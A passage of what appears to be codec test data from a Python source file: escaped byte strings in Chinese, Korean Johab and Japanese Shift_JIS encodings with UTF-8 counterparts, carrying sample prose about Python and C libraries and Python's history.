"\xb6\xc8\x2c\x20\xce\xd2\x82\x83\xb1\xe3\xb3\xa3\xcf\xa3\xcd\xfb"
"\xc4\xdc\xc0\xfb\xd3\xc3\xd2\xbb\xd0\xa9\xd2\xd1\xe9\x5f\xb0\x6c"
"\xba\xc3\xb5\xc4\x0a\x6c\x69\x62\x72\x61\x72\x79\x2c\x20\x81\x4b"
"\xd3\xd0\xd2\xbb\x82\x80\x20\x66\x61\x73\x74\x20\x70\x72\x6f\x74"
"\x6f\x74\x79\x70\x69\x6e\x67\x20\xb5\xc4\x20\x70\x72\x6f\x67\x72"
"\x61\x6d\x6d\x69\x6e\x67\x20\x6c\x61\x6e\x67\x75\x61\x67\x65\x20"
"\xbf\xc9\x0a\xb9\xa9\xca\xb9\xd3\xc3\x2e\x20\xc4\xbf\xc7\xb0\xd3"
"\xd0\xd4\x53\xd4\x53\xb6\xe0\xb6\xe0\xb5\xc4\x20\x6c\x69\x62\x72"
"\x61\x72\x79\x20\xca\xc7\xd2\xd4\x20\x43\x20\x8c\x91\xb3\xc9\x2c"
"\x20\xb6\xf8\x20\x50\x79\x74\x68\x6f\x6e\x20\xca\xc7\xd2\xbb\x82"
"\x80\x0a\x66\x61\x73\x74\x20\x70\x72\x6f\x74\x6f\x74\x79\x70\x69"
"\x6e\x67\x20\xb5\xc4\x20\x70\x72\x6f\x67\x72\x61\x6d\x6d\x69\x6e"
"\x67\x20\x6c\x61\x6e\x67\x75\x61\x67\x65\x2e\x20\xb9\xca\xce\xd2"
"\x82\x83\xcf\xa3\xcd\xfb\xc4\xdc\x8c\xa2\xbc\xc8\xd3\xd0\xb5\xc4"
"\x0a\x43\x20\x6c\x69\x62\x72\x61\x72\x79\x20\xc4\xc3\xb5\xbd\x20"
"\x50\x79\x74\x68\x6f\x6e\x20\xb5\xc4\xad\x68\xbe\xb3\xd6\xd0\x9c"
"\x79\xd4\x87\xbc\xb0\xd5\xfb\xba\xcf\x2e\x20\xc6\xe4\xd6\xd0\xd7"
"\xee\xd6\xf7\xd2\xaa\xd2\xb2\xca\xc7\xce\xd2\x82\x83\xcb\xf9\x0a"
"\xd2\xaa\xd3\x91\xd5\x93\xb5\xc4\x86\x96\xee\x7d\xbe\xcd\xca\xc7"
"\x3a\x0a\x0a",
"\x50\x79\x74\x68\x6f\x6e\xef\xbc\x88\xe6\xb4\xbe\xe6\xa3\xae\xef"
"\xbc\x89\xe8\xaf\xad\xe8\xa8\x80\xe6\x98\xaf\xe4\xb8\x80\xe7\xa7"
"\x8d\xe5\x8a\x9f\xe8\x83\xbd\xe5\xbc\xba\xe5\xa4\xa7\xe8\x80\x8c"
"\xe5\xae\x8c\xe5\x96\x84\xe7\x9a\x84\xe9\x80\x9a\xe7\x94\xa8\xe5"
"\x9e\x8b\xe8\xae\xa1\xe7\xae\x97\xe6\x9c\xba\xe7\xa8\x8b\xe5\xba"
"\x8f\xe8\xae\xbe\xe8\xae\xa1\xe8\xaf\xad\xe8\xa8\x80\xef\xbc\x8c"
"\x0a\xe5\xb7\xb2\xe7\xbb\x8f\xe5\x85\xb7\xe6\x9c\x89\xe5\x8d\x81"
"\xe5\xa4\x9a\xe5\xb9\xb4\xe7\x9a\x84\xe5\x8f\x91\xe5\xb1\x95\xe5"
"\x8e\x86\xe5\x8f\xb2\xef\xbc\x8c\xe6\x88\x90\xe7\x86\x9f\xe4\xb8"
"\x94\xe7\xa8\xb3\xe5\xae\x9a\xe3\x80\x82\xe8\xbf\x99\xe7\xa7\x8d"
"\xe8\xaf\xad\xe8\xa8\x80\xe5\x85\xb7\xe6\x9c\x89\xe9\x9d\x9e\xe5"
"\xb8\xb8\xe7\xae\x80\xe6\x8d\xb7\xe8\x80\x8c\xe6\xb8\x85\xe6\x99"
"\xb0\x0a\xe7\x9a\x84\xe8\xaf\xad\xe6\xb3\x95\xe7\x89\xb9\xe7\x82"
"\xb9\xef\xbc\x8c\xe9\x80\x82\xe5\x90\x88\xe5\xae\x8c\xe6\x88\x90"
"\xe5\x90\x84\xe7\xa7\x8d\xe9\xab\x98\xe5\xb1\x82\xe4\xbb\xbb\xe5"
"\x8a\xa1\xef\xbc\x8c\xe5\x87\xa0\xe4\xb9\x8e\xe5\x8f\xaf\xe4\xbb"
"\xa5\xe5\x9c\xa8\xe6\x89\x80\xe6\x9c\x89\xe7\x9a\x84\xe6\x93\x8d"
"\xe4\xbd\x9c\xe7\xb3\xbb\xe7\xbb\x9f\xe4\xb8\xad\x0a\xe8\xbf\x90"
"\xe8\xa1\x8c\xe3\x80\x82\xe8\xbf\x99\xe7\xa7\x8d\xe8\xaf\xad\xe8"
"\xa8\x80\xe7\xae\x80\xe5\x8d\x95\xe8\x80\x8c\xe5\xbc\xba\xe5\xa4"
"\xa7\xef\xbc\x8c\xe9\x80\x82\xe5\x90\x88\xe5\x90\x84\xe7\xa7\x8d"
"\xe4\xba\xba\xe5\xa3\xab\xe5\xad\xa6\xe4\xb9\xa0\xe4\xbd\xbf\xe7"
"\x94\xa8\xe3\x80\x82\xe7\x9b\xae\xe5\x89\x8d\xef\xbc\x8c\xe5\x9f"
"\xba\xe4\xba\x8e\xe8\xbf\x99\x0a\xe7\xa7\x8d\xe8\xaf\xad\xe8\xa8"
"\x80\xe7\x9a\x84\xe7\x9b\xb8\xe5\x85\xb3\xe6\x8a\x80\xe6\x9c\xaf"
"\xe6\xad\xa3\xe5\x9c\xa8\xe9\xa3\x9e\xe9\x80\x9f\xe7\x9a\x84\xe5"
"\x8f\x91\xe5\xb1\x95\xef\xbc\x8c\xe7\x94\xa8\xe6\x88\xb7\xe6\x95"
"\xb0\xe9\x87\x8f\xe6\x80\xa5\xe5\x89\xa7\xe6\x89\xa9\xe5\xa4\xa7"
"\xef\xbc\x8c\xe7\x9b\xb8\xe5\x85\xb3\xe7\x9a\x84\xe8\xb5\x84\xe6"
"\xba\x90\xe9\x9d\x9e\xe5\xb8\xb8\xe5\xa4\x9a\xe3\x80\x82\x0a\xe5"
"\xa6\x82\xe4\xbd\x95\xe5\x9c\xa8\x20\x50\x79\x74\x68\x6f\x6e\x20"
"\xe4\xb8\xad\xe4\xbd\xbf\xe7\x94\xa8\xe6\x97\xa2\xe6\x9c\x89\xe7"
"\x9a\x84\x20\x43\x20\x6c\x69\x62\x72\x61\x72\x79\x3f\x0a\xe3\x80"
"\x80\xe5\x9c\xa8\xe8\xb3\x87\xe8\xa8\x8a\xe7\xa7\x91\xe6\x8a\x80"
"\xe5\xbf\xab\xe9\x80\x9f\xe7\x99\xbc\xe5\xb1\x95\xe7\x9a\x84\xe4"
"\xbb\x8a\xe5\xa4\xa9\x2c\x20\xe9\x96\x8b\xe7\x99\xbc\xe5\x8f\x8a"
"\xe6\xb8\xac\xe8\xa9\xa6\xe8\xbb\x9f\xe9\xab\x94\xe7\x9a\x84\xe9"
"\x80\x9f\xe5\xba\xa6\xe6\x98\xaf\xe4\xb8\x8d\xe5\xae\xb9\xe5\xbf"
"\xbd\xe8\xa6\x96\xe7\x9a\x84\x0a\xe8\xaa\xb2\xe9\xa1\x8c\x2e\x20"
"\xe7\x82\xba\xe5\x8a\xa0\xe5\xbf\xab\xe9\x96\x8b\xe7\x99\xbc\xe5"
"\x8f\x8a\xe6\xb8\xac\xe8\xa9\xa6\xe7\x9a\x84\xe9\x80\x9f\xe5\xba"
"\xa6\x2c\x20\xe6\x88\x91\xe5\x80\x91\xe4\xbe\xbf\xe5\xb8\xb8\xe5"
"\xb8\x8c\xe6\x9c\x9b\xe8\x83\xbd\xe5\x88\xa9\xe7\x94\xa8\xe4\xb8"
"\x80\xe4\xba\x9b\xe5\xb7\xb2\xe9\x96\x8b\xe7\x99\xbc\xe5\xa5\xbd"
"\xe7\x9a\x84\x0a\x6c\x69\x62\x72\x61\x72\x79\x2c\x20\xe4\xb8\xa6"
"\xe6\x9c\x89\xe4\xb8\x80\xe5\x80\x8b\x20\x66\x61\x73\x74\x20\x70"
"\x72\x6f\x74\x6f\x74\x79\x70\x69\x6e\x67\x20\xe7\x9a\x84\x20\x70"
"\x72\x6f\x67\x72\x61\x6d\x6d\x69\x6e\x67\x20\x6c\x61\x6e\x67\x75"
"\x61\x67\x65\x20\xe5\x8f\xaf\x0a\xe4\xbe\x9b\xe4\xbd\xbf\xe7\x94"
"\xa8\x2e\x20\xe7\x9b\xae\xe5\x89\x8d\xe6\x9c\x89\xe8\xa8\xb1\xe8"
"\xa8\xb1\xe5\xa4\x9a\xe5\xa4\x9a\xe7\x9a\x84\x20\x6c\x69\x62\x72"
"\x61\x72\x79\x20\xe6\x98\xaf\xe4\xbb\xa5\x20\x43\x20\xe5\xaf\xab"
"\xe6\x88\x90\x2c\x20\xe8\x80\x8c\x20\x50\x79\x74\x68\x6f\x6e\x20"
"\xe6\x98\xaf\xe4\xb8\x80\xe5\x80\x8b\x0a\x66\x61\x73\x74\x20\x70"
"\x72\x6f\x74\x6f\x74\x79\x70\x69\x6e\x67\x20\xe7\x9a\x84\x20\x70"
"\x72\x6f\x67\x72\x61\x6d\x6d\x69\x6e\x67\x20\x6c\x61\x6e\x67\x75"
"\x61\x67\x65\x2e\x20\xe6\x95\x85\xe6\x88\x91\xe5\x80\x91\xe5\xb8"
"\x8c\xe6\x9c\x9b\xe8\x83\xbd\xe5\xb0\x87\xe6\x97\xa2\xe6\x9c\x89"
"\xe7\x9a\x84\x0a\x43\x20\x6c\x69\x62\x72\x61\x72\x79\x20\xe6\x8b"
"\xbf\xe5\x88\xb0\x20\x50\x79\x74\x68\x6f\x6e\x20\xe7\x9a\x84\xe7"
"\x92\xb0\xe5\xa2\x83\xe4\xb8\xad\xe6\xb8\xac\xe8\xa9\xa6\xe5\x8f"
"\x8a\xe6\x95\xb4\xe5\x90\x88\x2e\x20\xe5\x85\xb6\xe4\xb8\xad\xe6"
"\x9c\x80\xe4\xb8\xbb\xe8\xa6\x81\xe4\xb9\x9f\xe6\x98\xaf\xe6\x88"
"\x91\xe5\x80\x91\xe6\x89\x80\x0a\xe8\xa6\x81\xe8\xa8\x8e\xe8\xab"
"\x96\xe7\x9a\x84\xe5\x95\x8f\xe9\xa1\x8c\xe5\xb0\xb1\xe6\x98\xaf"
"\x3a\x0a\x0a"),
'johab': (
"\x99\xb1\xa4\x77\x88\x62\xd0\x61\x20\xcd\x5c\xaf\xa1\xc5\xa9\x9c"
"\x61\x0a\x0a\xdc\xc0\xdc\xc0\x90\x73\x21\x21\x20\xf1\x67\xe2\x9c"
"\xf0\x55\xcc\x81\xa3\x89\x9f\x85\x8a\xa1\x20\xdc\xde\xdc\xd3\xd2"
"\x7a\xd9\xaf\xd9\xaf\xd9\xaf\x20\x8b\x77\x96\xd3\x20\xdc\xd1\x95"
"\x81\x20\xdc\xc0\x2e\x20\x2e\x0a\xed\x3c\xb5\x77\xdc\xd1\x93\x77"
"\xd2\x73\x20\x2e\x20\x2e\x20\x2e\x20\x2e\x20\xac\xe1\xb6\x89\x9e"
"\xa1\x20\x95\x65\xd0\x62\xf0\xe0\x20\xe0\x3b\xd2\x7a\x20\x21\x20"
"\x21\x20\x21\x87\x41\x2e\x87\x41\x0a\xd3\x61\xd3\x61\xd3\x61\x20"
"\x88\x41\x88\x41\x88\x41\xd9\x69\x87\x41\x5f\x87\x41\x20\xb4\xe1"
"\x9f\x9a\x20\xc8\xa1\xc5\xc1\x8b\x7a\x20\x95\x61\xb7\x77\x20\xc3"
"\x97\xe2\x9c\x97\x69\xf0\xe0\x20\xdc\xc0\x97\x61\x8b\x7a\x0a\xac"
"\xe9\x9f\x7a\x20\xe0\x3b\xd2\x7a\x20\x2e\x20\x2e\x20\x2e\x20\x2e"
"\x20\x8a\x89\xb4\x81\xae\xba\x20\xdc\xd1\x8a\xa1\x20\xdc\xde\x9f"
"\x89\xdc\xc2\x8b\x7a\x20\xf1\x67\xf1\x62\xf5\x49\xed\xfc\xf3\xe9"
"\x8c\x61\xbb\x9a\x0a\xb5\xc1\xb2\xa1\xd2\x7a\x20\x21\x20\x21\x20"
"\xed\x3c\xb5\x77\xdc\xd1\x20\xe0\x3b\x93\x77\x8a\xa1\x20\xd9\x69"
"\xea\xbe\x89\xc5\x20\xb4\xf4\x93\x77\x8a\xa1\x93\x77\x20\xed\x3c"
"\x93\x77\x96\xc1\xd2\x7a\x20\x8b\x69\xb4\x81\x97\x7a\x0a\xdc\xde"
"\x9d\x61\x97\x41\xe2\x9c\x20\xaf\x81\xce\xa1\xae\xa1\xd2\x7a\x20"
"\xb4\xe1\x9f\x9a\x20\xf1\x67\xf1\x62\xf5\x49\xed\xfc\xf3\xe9\xaf"
"\x82\xdc\xef\x97\x69\xb4\x7a\x21\x21\x20\xdc\xc0\xdc\xc0\x90\x73"
"\xd9\xbd\x20\xd9\x62\xd9\x62\x2a\x0a\x0a",
"\xeb\x98\xa0\xeb\xb0\xa9\xea\xb0\x81\xed\x95\x98\x20\xed\x8e\xb2"
"\xec\x8b\x9c\xec\xbd\x9c\xeb\x9d\xbc\x0a\x0a\xe3\x89\xaf\xe3\x89"
"\xaf\xeb\x82\xa9\x21\x21\x20\xe5\x9b\xa0\xe4\xb9\x9d\xe6\x9c\x88"
"\xed\x8c\xa8\xeb\xaf\xa4\xeb\xa6\x94\xea\xb6\x88\x20\xe2\x93\xa1"
"\xe2\x93\x96\xed\x9b\x80\xc2\xbf\xc2\xbf\xc2\xbf\x20\xea\xb8\x8d"
"\xeb\x92\x99\x20\xe2\x93\x94\xeb\x8e\xa8\x20\xe3\x89\xaf\x2e\x20"
"\x2e\x0a\xe4\xba\x9e\xec\x98\x81\xe2\x93\x94\xeb\x8a\xa5\xed\x9a"
"\xb9\x20\x2e\x20\x2e\x20\x2e\x20\x2e\x20\xec\x84\x9c\xec\x9a\xb8"
"\xeb\xa4\x84\x20\xeb\x8e\x90\xed\x95\x99\xe4\xb9\x99\x20\xe5\xae"
"\xb6\xed\x9b\x80\x20\x21\x20\x21\x20\x21\xe3\x85\xa0\x2e\xe3\x85"
"\xa0\x0a\xed\x9d\x90\xed\x9d\x90\xed\x9d\x90\x20\xe3\x84\xb1\xe3"
"\x84\xb1\xe3\x84\xb1\xe2\x98\x86\xe3\x85\xa0\x5f\xe3\x85\xa0\x20"
"\xec\x96\xb4\xeb\xa6\xa8\x20\xed\x83\xb8\xec\xbd\xb0\xea\xb8\x90"
"\x20\xeb\x8e\x8c\xec\x9d\x91\x20\xec\xb9\x91\xe4\xb9\x9d\xeb\x93"
"\xa4\xe4\xb9\x99\x20\xe3\x89\xaf\xeb\x93\x9c\xea\xb8\x90\x0a\xec"
"\x84\xa4\xeb\xa6\x8c\x20\xe5\xae\xb6\xed\x9b\x80\x20\x2e\x20\x2e"
"\x20\x2e\x20\x2e\x20\xea\xb5\xb4\xec\x95\xa0\xec\x89\x8c\x20\xe2"
"\x93\x94\xea\xb6\x88\x20\xe2\x93\xa1\xeb\xa6\x98\xe3\x89\xb1\xea"
"\xb8\x90\x20\xe5\x9b\xa0\xe4\xbb\x81\xe5\xb7\x9d\xef\xa6\x81\xe4"
"\xb8\xad\xea\xb9\x8c\xec\xa6\xbc\x0a\xec\x99\x80\xec\x92\x80\xed"
"\x9b\x80\x20\x21\x20\x21\x20\xe4\xba\x9e\xec\x98\x81\xe2\x93\x94"
"\x20\xe5\xae\xb6\xeb\x8a\xa5\xea\xb6\x88\x20\xe2\x98\x86\xe4\xb8"
"\x8a\xea\xb4\x80\x20\xec\x97\x86\xeb\x8a\xa5\xea\xb6\x88\xeb\x8a"
"\xa5\x20\xe4\xba\x9e\xeb\x8a\xa5\xeb\x92\x88\xed\x9b\x80\x20\xea"
"\xb8\x80\xec\x95\xa0\xeb\x93\xb4\x0a\xe2\x93\xa1\xeb\xa0\xa4\xeb"
"\x93\x80\xe4\xb9\x9d\x20\xec\x8b\x80\xed\x92\x94\xec\x88\xb4\xed"
"\x9b\x80\x20\xec\x96\xb4\xeb\xa6\xa8\x20\xe5\x9b\xa0\xe4\xbb\x81"
"\xe5\xb7\x9d\xef\xa6\x81\xe4\xb8\xad\xec\x8b\x81\xe2\x91\xa8\xeb"
"\x93\xa4\xec\x95\x9c\x21\x21\x20\xe3\x89\xaf\xe3\x89\xaf\xeb\x82"
"\xa9\xe2\x99\xa1\x20\xe2\x8c\x92\xe2\x8c\x92\x2a\x0a\x0a"),
'shift_jis': (
"\x50\x79\x74\x68\x6f\x6e\x20\x82\xcc\x8a\x4a\x94\xad\x82\xcd\x81"
"\x41\x31\x39\x39\x30\x20\x94\x4e\x82\xb2\x82\xeb\x82\xa9\x82\xe7"
"\x8a\x4a\x8e\x6e\x82\xb3\x82\xea\x82\xc4\x82\xa2\x82\xdc\x82\xb7"
"\x81\x42\x0a\x8a\x4a\x94\xad\x8e\xd2\x82\xcc\x20\x47\x75\x69\x64"
"\x6f\x20\x76\x61\x6e\x20\x52\x6f\x73\x73\x75\x6d\x20\x82\xcd\x8b"
"\xb3\x88\xe7\x97\x70\x82\xcc\x83\x76\x83\x8d\x83\x4f\x83\x89\x83"
"\x7e\x83\x93\x83\x4f\x8c\xbe\x8c\xea\x81\x75\x41\x42\x43\x81\x76"
"\x82\xcc\x8a\x4a\x94\xad\x82\xc9\x8e\x51\x89\xc1\x82\xb5\x82\xc4"
"\x82\xa2\x82\xdc\x82\xb5\x82\xbd\x82\xaa\x81\x41\x41\x42\x43\x20"
"\x82\xcd\x8e\xc0\x97\x70\x8f\xe3\x82\xcc\x96\xda\x93\x49\x82\xc9"
"\x82\xcd\x82\xa0\x82\xdc\x82\xe8\x93\x4b\x82\xb5\x82\xc4\x82\xa2"
"\x82\xdc\x82\xb9\x82\xf1\x82\xc5\x82\xb5\x82\xbd\x81\x42\x0a\x82"
"\xb1\x82\xcc\x82\xbd\x82\xdf\x81\x41\x47\x75\x69\x64\x6f\x20\x82"
"\xcd\x82\xe6\x82\xe8\x8e\xc0\x97\x70\x93\x49\x82\xc8\x83\x76\x83"
"\x8d\x83\x4f\x83\x89\x83\x7e\x83\x93\x83\x4f\x8c\xbe\x8c\xea\x82"
"\xcc\x8a\x4a\x94\xad\x82\xf0\x8a\x4a\x8e\x6e\x82\xb5\x81\x41\x89"
"\x70\x8d\x91\x20\x42\x42\x53\x20\x95\xfa\x91\x97\x82\xcc\x83\x52"
"\x83\x81\x83\x66\x83\x42\x94\xd4\x91\x67\x81\x75\x83\x82\x83\x93"
"\x83\x65\x83\x42\x20\x83\x70\x83\x43\x83\x5c\x83\x93\x81\x76\x82"
"\xcc\x83\x74\x83\x40\x83\x93\x82\xc5\x82\xa0\x82\xe9\x20\x47\x75"
"\x69\x64\x6f\x20\x82\xcd\x82\xb1\x82\xcc\x8c\xbe\x8c\xea\x82\xf0"
"\x81\x75\x50\x79\x74\x68\x6f\x6e\x81\x76\x82\xc6\x96\xbc\x82\xc3"
"\x82\xaf\x82\xdc\x82\xb5\x82\xbd\x81\x42\x0a\x82\xb1\x82\xcc\x82"
"\xe6\x82\xa4\x82\xc8\x94\x77\x8c\x69\x82\xa9\x82\xe7\x90\xb6\x82"
"\xdc\x82\xea\x82\xbd\x20\x50\x79\x74\x68\x6f\x6e\x20\x82\xcc\x8c"
"\xbe\x8c\xea\x90\xdd\x8c\x76\x82\xcd\x81\x41\x81\x75\x83\x56\x83"
"\x93\x83\x76\x83\x8b\x81\x76\x82\xc5\x81\x75\x8f\x4b\x93\xbe\x82"
"\xaa\x97\x65\x88\xd5\x81\x76\x82\xc6\x82\xa2\x82\xa4\x96\xda\x95"
"\x57\x82\xc9\x8f\x64\x93\x5f\x82\xaa\x92\x75\x82\xa9\x82\xea\x82"
"\xc4\x82\xa2\x82\xdc\x82\xb7\x81\x42\x0a\x91\xbd\x82\xad\x82\xcc"
"\x83\x58\x83\x4e\x83\x8a\x83\x76\x83\x67\x8c\x6e\x8c\xbe\x8c\xea"
"\x82\xc5\x82\xcd\x83\x86\x81\x5b\x83\x55\x82\xcc\x96\xda\x90\xe6"
"\x82\xcc\x97\x98\x95\xd6\x90\xab\x82\xf0\x97\x44\x90\xe6\x82\xb5"
"\x82\xc4\x90\x46\x81\x58\x82\xc8\x8b\x40\x94\x5c\x82\xf0\x8c\xbe"
"\x8c\xea\x97\x76\x91\x66\x82\xc6\x82\xb5\x82\xc4\x8e\xe6\x82\xe8"
"\x93\xfc\x82\xea\x82\xe9\x8f\xea\x8d\x87\x82\xaa\x91\xbd\x82\xa2"
"\x82\xcc\x82\xc5\x82\xb7\x82\xaa\x81\x41\x50\x79\x74\x68\x6f\x6e"
"\x20\x82\xc5\x82\xcd\x82\xbb\x82\xa4\x82\xa2\x82\xc1\x82\xbd\x8f"
"\xac\x8d\xd7\x8d\x48\x82\xaa\x92\xc7\x89\xc1\x82\xb3\x82\xea\x82"
"\xe9\x82\xb1\x82\xc6\x82\xcd\x82\xa0\x82\xdc\x82\xe8\x82\xa0\x82"
"\xe8\x82\xdc\x82\xb9\x82\xf1\x81\x42\x0a\x8c\xbe\x8c\xea\x8e\xa9"
"\x91\xcc\x82\xcc\x8b\x40\x94\x5c\x82\xcd\x8d\xc5\x8f\xac\x8c\xc0"
"\x82\xc9\x89\x9f\x82\xb3\x82\xa6\x81\x41\x95\x4b\x97\x76\x82\xc8"
"\x8b\x40\x94\x5c\x82\xcd\x8a\x67\x92\xa3\x83\x82\x83\x57\x83\x85"
"\x81\x5b\x83\x8b\x82\xc6\x82\xb5\x82\xc4\x92\xc7\x89\xc1\x82\xb7"
"\x82\xe9\x81\x41\x82\xc6\x82\xa2\x82\xa4\x82\xcc\x82\xaa\x20\x50"
"\x79\x74\x68\x6f\x6e\x20\x82\xcc\x83\x7c\x83\x8a\x83\x56\x81\x5b"
"\x82\xc5\x82\xb7\x81\x42\x0a\x0a",
"\x50\x79\x74\x68\x6f\x6e\x20\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba"
"\xe3\x81\xaf\xe3\x80\x81\x31\x39\x39\x30\x20\xe5\xb9\xb4\xe3\x81"
"\x94\xe3\x82\x8d\xe3\x81\x8b\xe3\x82\x89\xe9\x96\x8b\xe5\xa7\x8b"
"\xe3\x81\x95\xe3\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3"
"\x81\x99\xe3\x80\x82\x0a\xe9\x96\x8b\xe7\x99\xba\xe8\x80\x85\xe3"
"\x81\xae\x20\x47\x75\x69\x64\x6f\x20\x76\x61\x6e\x20\x52\x6f\x73"
"\x73\x75\x6d\x20\xe3\x81\xaf\xe6\x95\x99\xe8\x82\xb2\xe7\x94\xa8"
"\xe3\x81\xae\xe3\x83\x97\xe3\x83\xad\xe3\x82\xb0\xe3\x83\xa9\xe3"
"\x83\x9f\xe3\x83\xb3\xe3\x82\xb0\xe8\xa8\x80\xe8\xaa\x9e\xe3\x80"
"\x8c\x41\x42\x43\xe3\x80\x8d\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba"
"\xe3\x81\xab\xe5\x8f\x82\xe5\x8a\xa0\xe3\x81\x97\xe3\x81\xa6\xe3"
"\x81\x84\xe3\x81\xbe\xe3\x81\x97\xe3\x81\x9f\xe3\x81\x8c\xe3\x80"
"\x81\x41\x42\x43\x20\xe3\x81\xaf\xe5\xae\x9f\xe7\x94\xa8\xe4\xb8"
"\x8a\xe3\x81\xae\xe7\x9b\xae\xe7\x9a\x84\xe3\x81\xab\xe3\x81\xaf"
"\xe3\x81\x82\xe3\x81\xbe\xe3\x82\x8a\xe9\x81\xa9\xe3\x81\x97\xe3"
"\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3\x81\x9b\xe3\x82\x93\xe3\x81"
"\xa7\xe3\x81\x97\xe3\x81\x9f\xe3\x80\x82\x0a\xe3\x81\x93\xe3\x81"
"\xae\xe3\x81\x9f\xe3\x82\x81\xe3\x80\x81\x47\x75\x69\x64\x6f\x20"
"\xe3\x81\xaf\xe3\x82\x88\xe3\x82\x8a\xe5\xae\x9f\xe7\x94\xa8\xe7"
"\x9a\x84\xe3\x81\xaa\xe3\x83\x97\xe3\x83\xad\xe3\x82\xb0\xe3\x83"
"\xa9\xe3\x83\x9f\xe3\x83\xb3\xe3\x82\xb0\xe8\xa8\x80\xe8\xaa\x9e"
"\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba\xe3\x82\x92\xe9\x96\x8b\xe5"
"\xa7\x8b\xe3\x81\x97\xe3\x80\x81\xe8\x8b\xb1\xe5\x9b\xbd\x20\x42"
"\x42\x53\x20\xe6\x94\xbe\xe9\x80\x81\xe3\x81\xae\xe3\x82\xb3\xe3"
"\x83\xa1\xe3\x83\x87\xe3\x82\xa3\xe7\x95\xaa\xe7\xb5\x84\xe3\x80"
"\x8c\xe3\x83\xa2\xe3\x83\xb3\xe3\x83\x86\xe3\x82\xa3\x20\xe3\x83"
"\x91\xe3\x82\xa4\xe3\x82\xbd\xe3\x83\xb3\xe3\x80\x8d\xe3\x81\xae"
"\xe3\x83\x95\xe3\x82\xa1\xe3\x83\xb3\xe3\x81\xa7\xe3\x81\x82\xe3"
"\x82\x8b\x20\x47\x75\x69\x64\x6f\x20\xe3\x81\xaf\xe3\x81\x93\xe3"
"\x81\xae\xe8\xa8\x80\xe8\xaa\x9e\xe3\x82\x92\xe3\x80\x8c\x50\x79"
"\x74\x68\x6f\x6e\xe3\x80\x8d\xe3\x81\xa8\xe5\x90\x8d\xe3\x81\xa5"
"\xe3\x81\x91\xe3\x81\xbe\xe3\x81\x97\xe3\x81\x9f\xe3\x80\x82\x0a"
"\xe3\x81\x93\xe3\x81\xae\xe3\x82\x88\xe3\x81\x86\xe3\x81\xaa\xe8"
"\x83\x8c\xe6\x99\xaf\xe3\x81\x8b\xe3\x82\x89\xe7\x94\x9f\xe3\x81"
"\xbe\xe3\x82\x8c\xe3\x81\x9f\x20\x50\x79\x74\x68\x6f\x6e\x20\xe3"
"\x81\xae\xe8\xa8\x80\xe8\xaa\x9e\xe8\xa8\xad\xe8\xa8\x88\xe3\x81"
"\xaf\xe3\x80\x81\xe3\x80\x8c\xe3\x82\xb7\xe3\x83\xb3\xe3\x83\x97"
"\xe3\x83\xab\xe3\x80\x8d\xe3\x81\xa7\xe3\x80\x8c\xe7\xbf\x92\xe5"
"\xbe\x97\xe3\x81\x8c\xe5\xae\xb9\xe6\x98\x93\xe3\x80\x8d\xe3\x81"
"\xa8\xe3\x81\x84\xe3\x81\x86\xe7\x9b\xae\xe6\xa8\x99\xe3\x81\xab"
"\xe9\x87\x8d\xe7\x82\xb9\xe3\x81\x8c\xe7\xbd\xae\xe3\x81\x8b\xe3"
"\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3\x81\x99\xe3\x80"
"\x82\x0a\xe5\xa4\x9a\xe3\x81\x8f\xe3\x81\xae\xe3\x82\xb9\xe3\x82"
"\xaf\xe3\x83\xaa\xe3\x83\x97\xe3\x83\x88\xe7\xb3\xbb\xe8\xa8\x80"
"\xe8\xaa\x9e\xe3\x81\xa7\xe3\x81\xaf\xe3\x83\xa6\xe3\x83\xbc\xe3"
"\x82\xb6\xe3\x81\xae\xe7\x9b\xae\xe5\x85\x88\xe3\x81\xae\xe5\x88"
"\xa9\xe4\xbe\xbf\xe6\x80\xa7\xe3\x82\x92\xe5\x84\xaa\xe5\x85\x88"
"\xe3\x81\x97\xe3\x81\xa6\xe8\x89\xb2\xe3\x80\x85\xe3\x81\xaa\xe6"
"\xa9\x9f\xe8\x83\xbd\xe3\x82\x92\xe8\xa8\x80\xe8\xaa\x9e\xe8\xa6"
"\x81\xe7\xb4\xa0\xe3\x81\xa8\xe3\x81\x97\xe3\x81\xa6\xe5\x8f\x96"
"\xe3\x82\x8a\xe5\x85\xa5\xe3\x82\x8c\xe3\x82\x8b\xe5\xa0\xb4\xe5"
"\x90\x88\xe3\x81\x8c\xe5\xa4\x9a\xe3\x81\x84\xe3\x81\xae\xe3\x81"
"\xa7\xe3\x81\x99\xe3\x81\x8c\xe3\x80\x81\x50\x79\x74\x68\x6f\x6e"
"\x20\xe3\x81\xa7\xe3\x81\xaf\xe3\x81\x9d\xe3\x81\x86\xe3\x81\x84"
"\xe3\x81\xa3\xe3\x81\x9f\xe5\xb0\x8f\xe7\xb4\xb0\xe5\xb7\xa5\xe3"
"\x81\x8c\xe8\xbf\xbd\xe5\x8a\xa0\xe3\x81\x95\xe3\x82\x8c\xe3\x82"
"\x8b\xe3\x81\x93\xe3\x81\xa8\xe3\x81\xaf\xe3\x81\x82\xe3\x81\xbe"
"\xe3\x82\x8a\xe3\x81\x82\xe3\x82\x8a\xe3\x81\xbe\xe3\x81\x9b\xe3"
"\x82\x93\xe3\x80\x82\x0a\xe8\xa8\x80\xe8\xaa\x9e\xe8\x87\xaa\xe4"
"\xbd\x93\xe3\x81\xae\xe6\xa9\x9f\xe8\x83\xbd\xe3\x81\xaf\xe6\x9c"
"\x80\xe5\xb0\x8f\xe9\x99\x90\xe3\x81\xab\xe6\x8a\xbc\xe3\x81\x95"
"\xe3\x81\x88\xe3\x80\x81\xe5\xbf\x85\xe8\xa6\x81\xe3\x81\xaa\xe6"
"\xa9\x9f\xe8\x83\xbd\xe3\x81\xaf\xe6\x8b\xa1\xe5\xbc\xb5\xe3\x83"
"\xa2\xe3\x82\xb8\xe3\x83\xa5\xe3\x83\xbc\xe3\x83\xab\xe3\x81\xa8"
"\xe3\x81\x97\xe3\x81\xa6\xe8\xbf\xbd\xe5\x8a\xa0\xe3\x81\x99\xe3"
"\x82\x8b\xe3\x80\x81\xe3\x81\xa8\xe3\x81\x84\xe3\x81\x86\xe3\x81"
"\xae\xe3\x81\x8c\x20\x50\x79\x74\x68\x6f\x6e\x20\xe3\x81\xae\xe3"
